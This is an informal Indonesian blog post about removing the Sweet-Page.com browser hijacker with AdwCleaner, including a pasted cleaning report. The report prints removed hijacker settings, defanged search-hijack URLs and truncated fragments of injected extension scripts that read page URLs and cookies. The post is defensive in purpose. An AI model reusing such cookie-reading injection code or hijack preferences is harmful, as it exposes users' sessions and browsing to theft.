Gaess, gue muncul lagi
nih. Nah kali ini gue mau ngasih tips ampuh. Tips ini beberapa waktu yang lalu
sudah menyelamakan kelangsungan browser gue. Jadi, kemaren HOMEPAGE browser gue
(Mozilla Firefox) berubah menjadi Sweet-Page.com. Normalnya, kalu lu buka
Mozilla kan langsung ada ‘google search engine’ kan. Nah kemaren beda, gue buka
Mozilla eh adanya malah Sweet-Page.com.
Gue curiga Sweet-Page
itu apa sih. Berhubung gue orangnya curigaan langsung deh gue googling.
Hasilnya, ternyata itu sejenis "virus" berupa "browser hijacker".
Akibat paling berbahaya dari virus ini bisa mencuri data-data berharga kamu.
Seperti email dan paswordnya, data M-Banking mu, dan aksi-aksi tidak terpuji
lainnya. Maklumlah Sweet-page.com kecilnya nggak pernah ngaji sih.. *lah
Secara lebih rinci gue gambarkan
aksi ‘tidak terpuji’ mereka diantaranya :
1.
Mengubah homepage default / mengubah homepage setingan
yang telah kita atur, pada saat awal menjalankan internet browser.
Misalnya: homepage default anda adalah Google, maka akan berubah Sweet-page.com, seperti pada image di atas.
2. Mengubah
default search engine setiap kali membuka browser, membuka tab baru, yaitu
search engine hijacker seperti tampak pada gambar di atas.
3. Memata-matai
kebiasaan kita berinternet berdasarkan cookie dan history web-web yang kita
kunjungi, sehingga anda akan dijejali berbagai iklan yang sangat mengganggu.
Dan kenapa di lepi gue bisa ada
sweet-page.com ?
Pertanyaan yang bagus ! Jadi kemarin
gue sempet download software gratisan dari salah satu web abal-abal.
Lu mungkin pernah mengalami kejadian
sekampret ini kan. Nah waspada saja gaes. FYI, browser hijacker selain
sweet-page.com ada kok. Diantaranya, Start.Qone8.com,MySearch, ShopNav , AboutBlank ,
CoolWebSearch , CoolWebSearch.image, Onlinestability.com , Security Toolbar, HeretoFind, dan lain-lain
yang banyak lagi.
Kembali ke sweet-page.com....
Menurut Malware Tips, laman yang
berbagi soal cara menghapus Sweet-Page dan malware lainnya:
"Sweet-Page.com is a browser
hijacker, which is promoted via other free downloads, and once installed it
will change your browser homepage to sweet-page.com."
Intinya,
"virus" malware Sweet-Page.com itu harus dihapus, dibasmi, dibunuh!
Caranya:
Download AdwCleaner di
link ini: ADWCLEANER DOWNLOAD LINK (This link will automatically download
AdwCleaner on your computer).
Sebelum install program
AdwCleaner, tutup semua program dan browser internet yang sedang dibuka.
Doble klik ikon AdwCleaner hasil download tadi (proses intall).
Setelah install selesai, program AdwCleaner akan terbuka.
Klik tombol Scan
Selesai scanning, klik tomblol Clean. Bunuh semuanya!
Ini
dia hasil kerja AdwCleaner di komputer gue sekaligus menghapus malware
Sweet-Page.com.
# AdwCleaner v3.023 -
Report created 04/04/2014 at 23:35:16
# Updated 01/04/2014 by
Xplode
# Operating System :
Windows 7 Ultimate (32 bits)
# Username : 1 - 1-PC
# Running from :
D:\DOWNLOADS\adwcleaner.exe
# Option : Clean
***** [ Services ] *****
***** [ Files / Folders ]
*****
Folder Deleted : C:\ProgramData\boost_interprocess
Folder Deleted :
C:\ProgramData\SNT
Folder Deleted :
C:\ProgramData\WPM
Folder Deleted :
C:\Program Files\Mega Browse
Folder Deleted :
C:\Program Files\SNT
Folder Deleted :
C:\Users\1\AppData\Local\Mobogenie
Folder Deleted :
C:\Users\1\AppData\Local\torch
Folder Deleted :
C:\Users\1\AppData\Local\Temp\Mega Browse
Folder Deleted :
C:\Users\1\Documents\Mobogenie
Folder Deleted :
C:\Users\FAMILY\AppData\Local\Conduit
Folder Deleted :
C:\Users\FAMILY\AppData\Local\NativeMessaging
Folder Deleted :
C:\Users\FAMILY\AppData\Local\torch
Folder Deleted :
C:\Users\FAMILY\AppData\Local\Temp\NativeMessaging
Folder Deleted :
C:\Users\FAMILY\AppData\LocalLow\Conduit
Folder Deleted :
C:\Users\FAMILY\AppData\Roaming\baidu
File Deleted : C:\END
File Deleted :
C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\searchplugins\WebSearch.xml
File Deleted :
C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\user.js
File Deleted :
C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\muewrru8.default\user.js
File Deleted :
C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local
Storage\hxxp_app.mam.conduit.com_0.localstorage
File Deleted :
C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local
Storage\hxxp_app.mam.conduit.com_0.localstorage-journal
File Deleted :
C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local
Storage\hxxp_storage.conduit.com_0.localstorage
File Deleted :
C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local
Storage\hxxp_storage.conduit.com_0.localstorage-journal
***** [ Shortcuts ] *****
Shortcut Disinfected :
C:\Users\Public\Desktop\Google Chrome.lnk
Shortcut Disinfected :
C:\Users\1\Desktop\Firefox NEW.lnk
Shortcut Disinfected :
C:\Users\1\Desktop\Firefox OLD.lnk
Shortcut Disinfected :
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
Shortcut Disinfected :
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla
Firefox (Safe Mode).lnk
Shortcut Disinfected :
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla
Firefox.lnk
Shortcut Disinfected :
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google
Chrome.lnk
Shortcut Disinfected :
C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet
Explorer.lnk
Shortcut Disinfected :
C:\Users\1\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
Shortcut Disinfected :
C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google
Chrome.lnk
Shortcut Disinfected :
C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch
Internet Explorer Browser.lnk
Shortcut Disinfected :
C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla
Firefox.lnk
Shortcut Disinfected :
C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User
Pinned\TaskBar\Google Chrome.lnk
Shortcut Disinfected :
C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User
Pinned\TaskBar\Internet Explorer.lnk
Shortcut Disinfected :
C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User
Pinned\TaskBar\Mozilla Firefox.lnk
***** [ Registry ] *****
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\au__rasapi32
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\au__rasmancs
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\LiveSupport_RASAPI32
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\livesupport_rasmancs
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASAPI32
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASMANCS
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasapi32
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App
Paths\MobogenieAdd
Value Deleted :
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_utorrent_RASAPI32
Key Deleted :
HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_utorrent_RASMANCS
Key Deleted :
HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted :
HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted :
HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted :
HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet
Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Data Restored :
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google
Chrome\shell\open\command
Key Deleted :
HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted :
HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted :
HKLM\Software\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted :
HKLM\Software\supWPM
***** [ Browsers ] *****
-\\ Internet Explorer
v8.0.7600.16385
Setting Restored :
HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
-\\ Mozilla Firefox v28.0
(en-US)
[ File :
C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\prefs.js ]
Line Deleted : user_pref("browser.search.defaultenginename,S",
"WebSearch");
Line Deleted :
user_pref("browser.search.defaulturl",
"hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51&l=1&q=");
Line Deleted : user_pref("browser.search.order.1",
"WebSearch");
Line Deleted :
user_pref("browser.search.order.1,S", "WebSearch");
Line Deleted :
user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Deleted :
user_pref("extensions.0sd.scode", "(function(){try{var url=(window.self.location.href
+
document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorob[...]
Line Deleted :
user_pref("extensions.2Mua0n5fa.scode", "(function(){try{var
url=(window.self.location.href +
document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]
Line Deleted :
user_pref("extensions.IwfG.scode", "(function(){try{var
url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumoro[...]
Line Deleted :
user_pref("extensions.L1CjSWwAf.scode", "(function(){try{var
url=(window.self.location.href +
document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]
Line Deleted :
user_pref("keyword.URL",
"hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51&l=1&q=");
[ File :
C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\muewrru8.default\prefs.js ]
Line Deleted :
user_pref("browser.startup.homepage",
"hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51");
[ File :
C:\Users\FAMILY\AppData\Roaming\Mozilla\Firefox\Profiles\cttpyw9p.default\prefs.js
]
-\\ Google Chrome
v33.0.1750.154
[ File :
C:\Users\1\AppData\Local\Google\Chrome\User Data\Default\preferences ]
[ File :
C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\preferences ]
*************************
AdwCleaner[R0].txt -
[39744 octets] - [28/02/2014 21:45:46]
AdwCleaner[R1].txt - [9773
octets] - [04/04/2014 23:33:36]
AdwCleaner[S0].txt -
[36508 octets] - [28/02/2014 21:48:20]
AdwCleaner[S1].txt - [7978
octets] - [04/04/2014 23:35:16]
########## EOF -
C:\AdwCleaner\AdwCleaner[S1].txt - [8038 octets] ##########
Finally,
AdwCleaner berjasa
besar menghapus virus itu dari lepi gue. Thank
you AdwCleaner, special thanks buat kawan-kawan blogger yang sudah berbagi
tips kece ini. Pesen gue terakhir, jangan
sembarangan download dan install software, terutama dari link atau situs
gratisan! Hati-hati......! Kejahatan ada disekitar anda, bahkan dari tempat
yang tidak pernah lu duga sebelumnya...!
See U Next Post...!